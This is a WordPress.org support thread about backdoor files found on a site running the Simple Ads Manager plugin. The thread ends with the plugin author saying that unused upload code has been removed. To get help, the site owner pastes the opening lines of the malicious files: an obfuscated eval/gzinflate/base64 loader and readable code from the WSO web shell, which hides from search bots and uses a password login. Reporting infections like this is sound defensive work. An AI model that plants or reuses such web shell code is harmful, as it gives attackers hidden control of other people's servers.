Title: wp-content/uploads/sam_conf.php
Last modified: August 22, 2016

---

# wp-content/uploads/sam_conf.php

 *  [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/)
 * Hello,
 * the Wordfence plugin was complaining about a file wp-content/uploads/sam_conf.
   php with 3511 bytes – I checked it just now and it is really looking strange.
   Also because it is not present on other websites where I have SAM running. It
   is dated from March 10th. Checking the webserver logs I find POST and GET requests
   on that file from an IP based in Hongkong (not the typical user on our website).
   Also someone was looking for that file earlier in the SAM plugin directory (the
   reason why I write here) – where no such file is.
 * The file starts with:
 * `<?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\
   x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\
   x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\
   x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\
   x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa`
 * It looks like my system has been hijacked or something like this?
 * Well, as a first action I moved the file away from the webspace.
 * Any ideas?
 * Cheers,
    Martin
 * [https://wordpress.org/plugins/simple-ads-manager/](https://wordpress.org/plugins/simple-ads-manager/)

Viewing 7 replies - 1 through 7 (of 7 total)

 *  Thread Starter [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894573)
 * Ok, just found two other suspicious files:
 * wp-content/plugins/simple-ads-manager/sam-config-sample.php (March 6th)
    wp-content/
   uploads/wp-config-sample.php (March 7th)
 * As both files are not on other WP installations I run I removed those files.
 * It seems like it started with sam-config-sample.php on March 6th.
 * I checked all other files on this webspace and it seems that no other files have
   been changed. At least the file date is older than March 6th…
 * The files content looks suspicious. wp-config-sample.php is also encoded like
   the first file in my first post (BTW: Where can I decode such files to see the
   real content?). sam-config-sample.php is not (which makes it look REALLY suspicious,
   even for a non programmer, as it checks for system stuff, PHP functions and a
   lot more). Here are the beginnings of both files:
 * wp-config-sample.php:
 *     ```
       <?php
       $auth_pass = "xxx";
       $color = "#df5";
       $default_action = 'FilesMan';
       $default_use_ajax = true;
       $default_charset = 'Windows-1251';
       preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQnxYY4cezEebFTvyRp4tx0gQW2Xli6u5i4qb/7PTN6WWlfME57rut+fk/OacJKo9FIGo1Go9HIG5bX3cksvi6Xuqf7J+/3Tz7bL8/O3nXP4av79MX+0Zn9pVJh39YY/CnNIzd8OnKnccTazAlD57psvQiCke9aVWad+vNwhj/enh49C2L85TldJ+yPvSs3xM/fnOnA/Yq/TpxJz4fEyjZh9oblWeiOuhMn7o/L9qbNasybzPxg4Jbtv+2qXnUF8uxNDxNXoBn/jF1n4IZlgtps1OrsQf0BOwpidhDMpwNb0IB/3K9ezL9u1m7W1na9qdeN3Lhsu2EYhF0/GNnVo/M3b6BIkgepXcqP7GrdyJk4X7vuV7c/j71g2o29iSsgIJc+u7438eKySps4I6/f/XMexG7UDedThOG5A3foTaEz
       ```
   
 * (I replaced the auth_pass by “xxx”.)
 * sam-config-sample.php:
 *     ```
       <?php
   
       $auth_pass="xxx";
       $color = "#df5";
       $default_action = 'FilesMan';
       $default_use_ajax = true;
       $default_charset = 'Windows-1251';
   
       if(!empty($_SERVER['HTTP_USER_AGENT'])) {
           $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
               header('HTTP/1.0 404 Not Found');
               exit;
           }
       }
   
       @ini_set('error_log',NULL);
       @ini_set('log_errors',0);
       @ini_set('max_execution_time',0);
       @set_time_limit(0);
       @set_magic_quotes_runtime(0);
       @define('WSO_VERSION', '2.5.1');
   
       if(get_magic_quotes_gpc()) {
               function WSOstripslashes($array) {
                       return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
               }
               $_POST = WSOstripslashes($_POST);
           $_COOKIE = WSOstripslashes($_COOKIE);
       }
   
       function wsoLogin() {
               die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
       }
   
       function WSOsetcookie($k, $v) {
           $_COOKIE[$k] = $v;
           setcookie($k, $v);
       }
   
       if(!empty($auth_pass)) {
           if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
               WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
   
           if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
               wsoLogin();
       }
       ```
   
 * (I replaced the auth_pass by “xxx” here, too.)
 *  Plugin Author [minimus](https://wordpress.org/support/users/minimus/)
 * (@minimus)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894677)
 * These files **are not the part** of the original set of files of the SAM plugin!
 *  Thread Starter [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894683)
 * Yes I know. Interesting that they show up in this directory and under these names.
 * I checked everything with Wordfence, did not find anything more than these three
   files. Also no other files altered.
 *  [vashmyvindows](https://wordpress.org/support/users/vashmyvindows/)
 * (@vashmyvindows)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894831)
 * I just want to add my experience here — one of my client’s sites was hijacked
   last week, and most of the infected files seem to be in the SAM plugin folder.
   The WordPress install and all plugins were up to date, I believe.
 * I’m seeing malicious “sam_conf.php” and “sam-config-sample.php” in the SAM plugin
   folder. The intruder left several malicious files on the root of the site with
   names like “cache.php” and “402.php”, and a few such files in /wp-admin and /
   wp-includes.
 * I don’t know if the hack was enabled by a vulnerability in SAM, but it might 
   be a good idea to investigate!
 *  [Kevin Cristiano](https://wordpress.org/support/users/kcristiano/)
 * (@kcristiano)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894859)
 * Can you post an update here since you have pushed out a new version? It would
   be good to kn ow what you found — now that it has been corrected.
 * Thanks.
 *  Plugin Author [minimus](https://wordpress.org/support/users/minimus/)
 * (@minimus)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894861)
 * I removed unused code from the file sam-ajax-admin.php. Attackers could use this
   piece of code to upload files to the server.
 *  Thread Starter [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894868)
 * So SAM was the reason for my problems. Good to know and thank you for digging
   into this and releasing a patched version.
 * Did you get any further information what happened when a website was affected
   by hackers?

Viewing 7 replies - 1 through 7 (of 7 total)

The topic ‘wp-content/uploads/sam_conf.php’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/simple-ads-manager_73687f.svg)
 * [Simple Ads Manager](https://wordpress.org/plugins/simple-ads-manager/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/simple-ads-manager/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/simple-ads-manager/)
 * [Active Topics](https://wordpress.org/support/plugin/simple-ads-manager/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/simple-ads-manager/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/simple-ads-manager/reviews/)

 * 7 replies
 * 4 participants
 * Last reply from: [msebald](https://wordpress.org/support/users/msebald/)
 * Last activity: [11 years, 1 month ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894868)
 * Status: not resolved